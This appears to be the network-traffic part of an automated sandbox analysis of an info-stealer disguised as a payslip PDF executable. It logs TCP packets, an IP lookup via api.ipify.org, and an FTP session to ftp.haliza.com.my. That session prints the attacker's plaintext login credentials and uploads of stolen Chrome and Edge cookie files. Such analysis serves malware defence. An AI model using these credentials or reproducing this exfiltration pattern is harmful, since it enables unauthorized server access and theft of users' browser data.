                                            Nov 4, 2024 10:16:51.137854099 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.138060093 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142457962 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142467976 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142479897 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142488956 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142568111 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142621994 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142659903 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142776012 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142836094 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.142915010 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.143354893 CET5694650023110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:51.143471003 CET5002356946192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.196777105 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:51.906769037 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:52.088095903 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:57.504298925 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:57.509278059 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:57.509346962 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.451360941 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.457046986 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.461977959 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.812264919 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:58.816231012 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:58.821039915 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.197164059 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.197314024 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:59.202229023 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.552597046 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:16:59.552714109 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:16:59.557606936 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.009773016 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.012265921 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.017357111 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.412107944 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.412257910 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.417119026 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.767286062 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:00.773122072 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:00.899893045 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.025422096 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.025461912 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.025481939 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.025527954 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.025851965 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.030667067 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.970776081 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.971080065 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.975975037 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976052999 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976067066 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976080894 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976094007 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976114035 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976182938 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.976221085 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976234913 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976249933 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976281881 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.976290941 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.976321936 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.981152058 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981178045 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981192112 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981204987 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981281996 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981295109 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981322050 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.981405020 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.981415987 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.981667042 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:01.986186028 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986354113 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986399889 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986468077 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986540079 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986604929 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986640930 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.986726999 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.987113953 CET4993350025110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:01.987214088 CET5002549933192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:02.087433100 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:02.786523104 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:02.899902105 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:04.839067936 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:04.844753027 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:05.194322109 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:05.194960117 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:05.200076103 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:05.200148106 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:05.200253963 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:05.205096006 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.114967108 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.120174885 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.125191927 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125202894 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125219107 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125227928 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125269890 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.125272036 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125282049 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125315905 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.125344038 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125384092 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125394106 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125401974 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.125471115 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.130183935 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130234957 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130289078 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130297899 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130346060 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130354881 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130388021 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130392075 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.130439043 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.130605936 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130732059 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.130778074 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.132134914 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.135404110 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.135514021 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.135546923 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.135620117 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.135667086 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.136984110 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.137017965 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.137408018 CET5006650026110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:06.141133070 CET5002650066192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.198127985 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:06.904292107 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:07.087397099 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:10.855658054 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:10.860506058 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.108489037 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.113238096 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.212542057 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.212903023 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.217679977 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.217767954 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.217829943 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.222592115 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.465626955 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.465950012 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.472182989 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:11.472361088 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.472387075 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:11.477207899 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.140006065 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.140950918 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.145881891 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.145893097 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.145912886 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.145924091 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.145967007 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150557041 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150568962 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150578976 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150588989 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150599003 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150609016 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150620937 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150635958 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150670052 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150842905 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150854111 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150861979 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150878906 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.150891066 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150902987 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.150943041 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.155355930 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155366898 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155375957 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155416012 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.155436039 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.155550003 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155560017 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155569077 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155586958 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155613899 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.155636072 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.155705929 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.155747890 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.160171986 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.160181999 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.160233021 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.160341978 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.160449982 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.160460949 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165045023 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165055037 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165064096 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165074110 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165083885 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165230989 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.165960073 CET5390350027110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.166013002 CET5002753903192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.181162119 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.398058891 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.402285099 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.407156944 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407167912 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407182932 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407191992 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407243967 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407253981 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407283068 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407293081 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407387018 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.407394886 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407406092 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.407450914 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412302971 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412349939 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412358046 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412384987 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412394047 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412414074 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412415981 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412450075 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412450075 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412470102 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412478924 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412501097 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412514925 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412542105 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412545919 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412576914 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.412602901 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412652969 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.412705898 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.418474913 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.418561935 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.418644905 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.419751883 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.419760942 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.420026064 CET5341450028110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.420243979 CET5002853414192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.446872950 CET5002421192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:12.910747051 CET2149709110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:12.962409973 CET4970921192.168.2.5110.4.45.197
                                            Nov 4, 2024 10:17:13.186772108 CET2150024110.4.45.197192.168.2.5
                                            Nov 4, 2024 10:17:13.243650913 CET5002421192.168.2.5110.4.45.197

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 4, 2024 10:13:01.644409895 CET5137253192.168.2.51.1.1.1
                                            Nov 4, 2024 10:13:01.651252985 CET53513721.1.1.1192.168.2.5
                                            Nov 4, 2024 10:13:03.203773022 CET5497853192.168.2.51.1.1.1
                                            Nov 4, 2024 10:13:03.459189892 CET53549781.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 4, 2024 10:13:01.644409895 CET192.168.2.51.1.1.10x161cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                            Nov 4, 2024 10:13:03.203773022 CET192.168.2.51.1.1.10xa870Standard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 4, 2024 10:13:01.651252985 CET1.1.1.1192.168.2.50x161cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                            Nov 4, 2024 10:13:01.651252985 CET1.1.1.1192.168.2.50x161cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                            Nov 4, 2024 10:13:01.651252985 CET1.1.1.1192.168.2.50x161cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                            Nov 4, 2024 10:13:03.459189892 CET1.1.1.1192.168.2.50xa870No error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • api.ipify.org

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549706172.67.74.152443528C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-04 09:13:02 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-11-04 09:13:02 UTC399INHTTP/1.1 200 OK
                                            Date: Mon, 04 Nov 2024 09:13:02 GMT
                                            Content-Type: text/plain
                                            Content-Length: 14
                                            Connection: close
                                            Vary: Origin
                                            cf-cache-status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8dd37c5e9dff2cd6-DFW
                                            server-timing: cfL4;desc="?proto=TCP&rtt=2359&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=1215785&cwnd=251&unsent_bytes=0&cid=3c841d748402eaf4&ts=330&x=0"
                                            2024-11-04 09:13:02 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                            Data Ascii: 173.254.250.69


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549715172.67.74.1524436552C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-04 09:13:15 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-11-04 09:13:15 UTC398INHTTP/1.1 200 OK
                                            Date: Mon, 04 Nov 2024 09:13:15 GMT
                                            Content-Type: text/plain
                                            Content-Length: 14
                                            Connection: close
                                            Vary: Origin
                                            cf-cache-status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8dd37cb0be47ddb3-DFW
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1176&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2443881&cwnd=73&unsent_bytes=0&cid=d0663724a7e0a820&ts=528&x=0"
                                            2024-11-04 09:13:15 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                            Data Ascii: 173.254.250.69


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549739172.67.74.1524432800C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            TimestampBytes transferredDirectionData
                                            2024-11-04 09:13:23 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-11-04 09:13:24 UTC399INHTTP/1.1 200 OK
                                            Date: Mon, 04 Nov 2024 09:13:24 GMT
                                            Content-Type: text/plain
                                            Content-Length: 14
                                            Connection: close
                                            Vary: Origin
                                            cf-cache-status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8dd37ce4bb741442-DFW
                                            server-timing: cfL4;desc="?proto=TCP&rtt=1196&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2435660&cwnd=251&unsent_bytes=0&cid=54615130f8284974&ts=243&x=0"
                                            2024-11-04 09:13:24 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39
                                            Data Ascii: 173.254.250.69


                                            FTP Packets

                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Nov 4, 2024 10:13:04.461606026 CET2149709110.4.45.197192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                            Nov 4, 2024 10:13:04.461891890 CET4970921192.168.2.5110.4.45.197USER origin@haliza.com.my
                                            Nov 4, 2024 10:13:04.824552059 CET2149709110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:13:04.827223063 CET4970921192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:13:05.222310066 CET2149709110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:13:05.580542088 CET2149709110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:13:05.580734015 CET4970921192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:13:05.936120987 CET2149709110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:13:05.936284065 CET4970921192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:13:06.294846058 CET2149709110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:13:06.295129061 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:06.650208950 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,210,95)
                                            Nov 4, 2024 10:13:06.655981064 CET4970921192.168.2.5110.4.45.197STOR CO_Chrome_Default.txt_user-960781_2024_11_04_04_33_02.txt
                                            Nov 4, 2024 10:13:07.585129976 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:07.941498995 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.356 seconds (measured here), 0.79 Kbytes per second
                                            Nov 4, 2024 10:13:07.942117929 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:13:08.297616005 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,192,210)
                                            Nov 4, 2024 10:13:08.303241968 CET4970921192.168.2.5110.4.45.197STOR CO_Edge Chromium_Default.txt_user-960781_2024_11_04_10_41_34.txt
                                            Nov 4, 2024 10:13:09.216640949 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:13:09.561566114 CET2149709110.4.45.197192.168.2.5226 File successfully transferred
